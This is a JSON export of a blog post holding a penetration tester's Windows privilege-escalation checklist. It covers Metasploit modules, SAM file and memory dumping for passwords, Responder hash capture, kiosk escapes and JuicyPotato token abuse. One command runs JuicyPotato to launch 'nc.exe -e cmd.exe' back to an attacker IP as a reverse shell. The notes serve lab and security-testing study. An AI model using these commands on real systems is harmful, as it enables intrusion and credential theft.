{"id":2169,"date":"2021-01-09T16:37:41","date_gmt":"2021-01-09T15:37:41","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=2169"},"modified":"2024-08-31T20:03:44","modified_gmt":"2024-08-31T18:03:44","slug":"windows-privilege-escalation","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=2169","title":{"rendered":"Windows privilege escalation"},"content":{"rendered":"\n<ol class=\"wp-block-list\">\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2185\" data-type=\"post\" data-id=\"2185\">Per\u00adform basic Win\u00addows sys\u00adtem enumeration<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2189\" data-type=\"post\" data-id=\"2189\">Enu\u00admer\u00adate the file system(s)<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2195\" data-type=\"post\" data-id=\"2195\">Per\u00adform priv\u00adi\u00adlege esca\u00adla\u00adtion scripts<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=4141\" data-type=\"post\" data-id=\"4141\">Check the Win\u00addows Ser\u00advice Exploita\u00adtion&nbsp;post<\/a><\/li>\n\n\n\n<li>Per\u00adform Metas\u00adploit Pos\u00adtex modules<\/li>\n\n\n\n<li>Per\u00adform <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1242\" data-type=\"post\" data-id=\"1242\">Empire<\/a> pos\u00adtex modules&nbsp;<ul class=\"wp-block-list\">\n<li>Exe\u00adcute PowerUp<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Try oth\u00ader&nbsp;stuff<\/li>\n\n\n\n<li>Per\u00adform the steps&nbsp;again.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">After these steps, more things to&nbsp;do:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Metas\u00adploit:\n<ul class=\"wp-block-list\">\n<li><code>msf&gt; use multi\/recon\/local_exploit_suggester<\/code><\/li>\n\n\n\n<li><code>msf&gt; post\/windows\/*<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Check out the <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2495\" data-type=\"post\" data-id=\"2495\">Win\u00addows Sub\u00adsys\u00adtem for&nbsp;Linux<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Work with processes<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">For enu\u00admer\u00ada\u00adtion of process\u00ades, see the <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2185\" data-type=\"post\" data-id=\"2185\">Basic Win\u00addows sys\u00adtem enu\u00admer\u00ada\u00adtion post<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Kill a process<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">taskkill \/PID $pid\ntaskkill \/IM notepad.exe\n\npskill \/accepteula $pid \/\/ With SysinternalTools<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Sus\u00adpend and con\u00adtin\u00adue a run\u00adning process with SysinternalTools:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">pssuspend \/accepteula notepad.exe\n...\npssuspend \/accepteula -r notepad.exe<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Work with&nbsp;DLL\u2019s<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Show all loaded unsigned DLL\u2019s on the sys\u00adtems. This can help to detect mali\u00adcious&nbsp;code.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">listdlls \/accepteula -a \/\/ With SysinternalTools<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Various topics<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2233\" data-type=\"post\" data-id=\"2233\">Bypass\u00ading Win\u00addows pro\u00adtec\u00adtion mechanisms.<\/a>\n<ol class=\"wp-block-list\">\n<li>Exe\u00adcu\u00adtion<\/li>\n\n\n\n<li>Fire\u00adwall<\/li>\n\n\n\n<li><span class=\"caps\">UAC<\/span><\/li>\n\n\n\n<li>Win\u00addows Defender<\/li>\n<\/ol>\n<\/li>\n\n\n\n<li><a href=\"http:\/\/rdp\">A<\/a><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1592\" data-type=\"post\" data-id=\"1592\">dd a <span class=\"caps\">RDP<\/span> account and log in via the&nbsp;<span class=\"caps\">GUI<\/span>.<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1945\">Mon\u00adi\u00adtor the live system<\/a><\/li>\n\n\n\n<li>If the AlwaysIn\u00adstal\u00adlEl\u00ade\u00advat\u00aded val\u00adues are 1 from this query:<br><code>reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer \/v AlwaysInstallElevated<\/code><br><a href=\"https:\/\/guide.offsecnewbie.com\/privilege-escalation\/windows-pe\">then see here<\/a>.<\/li>\n\n\n\n<li><a href=\"https:\/\/guide.offsecnewbie.com\/privilege-escalation\/windows-pe\">Check the list of ker\u00adnel exploits<\/a> for the cur\u00adrent system.<\/li>\n\n\n\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1946\" data-type=\"post\" data-id=\"1946\">Run respon\u00adder<\/a> to see traffic<\/li>\n\n\n\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=761\">Get <span class=\"caps\">SAM<\/span>&nbsp;files<\/a><\/li>\n\n\n\n<li>Browse trough logs in <span class=\"caps\">PS<\/span>. E.g. see Logs from a user. <a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.management\/get-eventlog?view=powershell-5.1\">More Info&nbsp;here.<\/a><br><code>Get-EventeLog -UserName ryan<\/code><\/li>\n\n\n\n<li>Exe\u00adcute a com\u00admand as anoth\u00ader user:<br><code>runas \/user:userName cmd.exe<\/code><\/li>\n\n\n\n<li>If you don\u2019t have access to a file you want&nbsp;to:&nbsp;<ul class=\"wp-block-list\">\n<li>Check per\u00admis\u00adsions on the file with <code>icacls<\/code>.<\/li>\n\n\n\n<li>Check per\u00admis\u00adsions with <code>icacls<\/code> also at the directory.<\/li>\n\n\n\n<li>Check var\u00adi\u00adous <code>dir<\/code> com\u00admands to see spe\u00adcial per\u00admis\u00adsions, alter\u00adnate streams.<\/li>\n\n\n\n<li>Try to change own\u00ader\u00adship:<br><code>icacls root.txt \/grant alfred:F<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>If you can exe\u00adcute a <span class=\"caps\">GUI<\/span> pro\u00adgram with elea\u00advat\u00aded priv\u00adi\u00adleges, open the open dia\u00adlog, add into the path <code>file:\/\/c:\/windows\/system32\/cmd.exe <\/code>and \u201copen\u201d.<\/li>\n\n\n\n<li>If you have access to a sys\u00adtem, but no <span class=\"caps\">NTLM<\/span> hash\u00ades, try to con\u00adnect to an own serv\u00ader with <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1946\" data-type=\"post\" data-id=\"1946\">Respon\u00adder<\/a> to get a <span class=\"caps\">NTLM<\/span>&nbsp;hash.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">External ressources<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"http:\/\/www.fuzzysecurity.com\/tutorials.html\">Fuzzy\u00adSe\u00adcu\u00adri\u00adty<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\">Pay\u00adload\u00adAll\u00adTheThings<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/book.hacktricks.xyz\/windows\/checklist-windows-privilege-escalation\">Check\u00adlist from hacktricks<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/C0nd4\/OSCP-Priv-Esc\">Check\u00adlist of&nbsp;areas<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Various things to use and remember<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Need details about a com\u00admand?<br><code>help $command<\/code><\/li>\n\n\n\n<li>Build-in com\u00admands (type <code>help<\/code> for the com\u00adplete&nbsp;list):&nbsp;<ul class=\"wp-block-list\">\n<li>Show file attrib\u00adut\u00ades<br><code>attrib $file<\/code><\/li>\n\n\n\n<li>Show (and change!) ACLs of a file:<br><code>cacls $file<\/code><br><code>icacls $file<\/code> \/\/ can also modify!<\/li>\n\n\n\n<li>Diff \/ Com\u00adpare two files:<br><code>comp $f1 $f2<\/code><br>or<br><code>fc $f1 $f2<\/code><\/li>\n\n\n\n<li>The com\u00admand fsu\u00adtil gives infor\u00adma\u00adtion about the file sys\u00adtems. Use\u00adful sub\u00adcom\u00admands:<br><code>fsutil fsInfo drives <\/code>\/\/ Returns all avail\u00adable dri\u00adves<br><code>fsutil quota ...<\/code> \/\/ Man\u00adage quo\u00adta limits<\/li>\n\n\n\n<li>Show \/ set exe\u00adcute\u00adable search paths:<br><code>path<\/code><\/li>\n\n\n\n<li>Show \/ set envi\u00adron\u00adment vari\u00adables:<br><code>set<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Grep\u00adping through large out\u00adput with find\u00adstr (<a href=\"https:\/\/docs.microsoft.com\/de-de\/windows-server\/administration\/windows-commands\/findstr\">Man\u00adpage<\/a>):\n<ul class=\"wp-block-list\">\n<li>Find a string case-insen\u00adsi\u00adtive:<br><code>dir \/s \/a | findstr \/i \/C:password<\/code><\/li>\n\n\n\n<li>Find all lines which does\u00adn\u2019t include a string:<br><code>dir \/s \/a | findstr \/i \/v \/C:TEMP<\/code><\/li>\n\n\n\n<li>Find all lines which start with a string:<br><code>dir \/s \/a | findstr \/i \/b \/C:bla<\/code><\/li>\n\n\n\n<li>Find all lines which end with a string:<br><code>dir \/s \/a | findstr \/i \/e \/C:.docx<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>How to down\u00adload files with notepad:<br><img loading=\"lazy\" decoding=\"async\" width=\"500\" height=\"209\" class=\"wp-image-3162\" style=\"width: 500px;\" src=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2021\/01\/Bildschirmfoto-2021-05-05-um-10.46.04.png\" alt srcset=\"https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/01\/Bildschirmfoto-2021-05-05-um-10.46.04.png 1068w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/01\/Bildschirmfoto-2021-05-05-um-10.46.04-300x125.png 300w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/01\/Bildschirmfoto-2021-05-05-um-10.46.04-1024x428.png 1024w, https:\/\/infosec.andreas-klingler.de\/wp-content\/uploads\/2021\/01\/Bildschirmfoto-2021-05-05-um-10.46.04-768x321.png 768w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\"><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Ideas of dispear<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Some process\u00ades can hold sen\u00adsi\u00adtive data in their mem\u00ado\u00adry. Check if an inter\u00adest\u00ading process is run\u00adning (Brows\u00ader!). Use procdump.exe to dump the mem\u00ado\u00adry and ana\u00adlyze it local\u00adly. (E.g with strings &lt;dump&gt; or a hex edi\u00adtor or grep for pass\u00adword string or known user string.)<br><code>procdump64.exe -ma -accepteula<\/code><\/li>\n\n\n\n<li>Exe\u00adcute <code>driverquery \/v<\/code> and search for ker\u00adnel dri\u00adver exploits.<\/li>\n\n\n\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/streams\">Check alter\u00adnate data streams<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/github.com\/ohpe\/juicy-potato\">Try the JuicyPotatoe<\/a>\n<ul class=\"wp-block-list\">\n<li>Priv\u00adi\u00adlege <code>SeImpersonate<\/code> or <code>SeAssignPrimaryToken<\/code> needed.<\/li>\n\n\n\n<li>Exam\u00adple: JuicyPotato.exe \u2011t * \u2011p \u201cC:\\Temp\\p64_443.exe\u201d \u2011l&nbsp;5542<\/li>\n\n\n\n<li>If error <em><span class=\"caps\">COM<\/span> -&gt; recv failed with error: 10038<\/em> occurs, <a href=\"https:\/\/github.com\/ohpe\/juicy-potato\/tree\/master\/CLSID\">check oth\u00ader <span class=\"caps\">CLSID<\/span>.<\/a> (See also the juicy_potato_clsid_runner.bat script.)<\/li>\n\n\n\n<li>Read cre\u00adden\u00adtials for users <span class=\"caps\">DPAPI<\/span> etc.: https:\/\/gallery.technet.microsoft.com\/scriptcenter\/PowerShell-Credentials-d44c3cde\/view\/Discussions#content<\/li>\n\n\n\n<li>Alter\u00adna\u00adtive: <a href=\"https:\/\/github.com\/Re4son\/Churrasco\">Try chur\u00adras\u00adco<\/a><\/li>\n\n\n\n<li>Or see <span class=\"caps\">MS10-059<\/span> exploit in the win\u00addows-ker\u00adnel-exploits direc\u00adto\u00adry. (Open nc han\u00addler local\u00adly, exe\u00adcute <span class=\"caps\">MS10-059<\/span>.exe on the vic\u00adtim with your own <span class=\"caps\">IP<\/span> and&nbsp;port.)<\/li>\n\n\n\n<li>Try all <span class=\"caps\">CLSIDS<\/span> in the com\u00admand line:<br><code>for \/F \"tokens=*\" %A in (clsids2.txt) do Juicy.Potato.x86.exe -t * -p C:\\Temp\\s32.exe -l 5542 -c %A<\/code><br><code>for \/F \"tokens=*\" %A in (clsids2.txt) do Juicy.Potato.x86.exe -t * -p C:\\windows\\system32\\cmd.exe -a \"\/c C:\\wamp\\www\\nc.exe -e cmd.exe 192.168.49.179 80\" -l 5542 -c %A<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Some appli\u00adca\u00adtions does\u00adn\u2019t work any\u00admore, but old one may do. Try an old attack\u00ading machine or ver\u00adsion of some pre\u00advi\u00adous\u00adly tried software.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Kiosk mode escape<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>You can down\u00adload in open dialogs.<\/li>\n\n\n\n<li>Try to open oth\u00ader process\u00ades with\u00adin the allowed application.<\/li>\n\n\n\n<li>Try to open an explorer.<\/li>\n\n\n\n<li>Type \u201cexplor\u00ader\u201d in a explor\u00ader to start a Win\u00addows set up script.<\/li>\n\n\n\n<li>Upload base64 encod\u00aded file via <span class=\"caps\">HTTP<\/span> in Notepad open dia\u00adlog and decode it with certutil.<\/li>\n\n\n\n<li>Exe\u00adcute via dll or rundll32 or as screensaver.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>After these steps, more things to&nbsp;do: Work with process\u00ades For enu\u00admer\u00ada\u00adtion of process\u00ades, see the Basic Win\u00addows sys\u00adtem enu\u00admer\u00ada\u00adtion post. Kill a process taskkill \/<span class=\"caps\">PID<\/span> $pid taskkill \/<span class=\"caps\">IM<\/span> notepad.exe pskill \/accepteula $pid \/\/ With Sys\u00adin\u00adternal\u00adTools Sus\u00adpend and con\u00adtin\u00adue a run\u00adning process with Sys\u00adin\u00adternal\u00adTools: pssus\u00adpend \/accepteula notepad.exe \u2026 pssus\u00adpend \/accepteula \u2011r notepad.exe Work with&nbsp;<span class=\"caps\">DLL<\/span>\u2019s Show&nbsp;all&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[468],"tags":[53,24],"class_list":["post-2169","post","type-post","status-publish","format-standard","hentry","category-general","tag-privilege-escalation","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2169","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2169"}],"version-history":[{"count":52,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2169\/revisions"}],"predecessor-version":[{"id":4159,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2169\/revisions\/4159"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2169"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2169"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2169"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}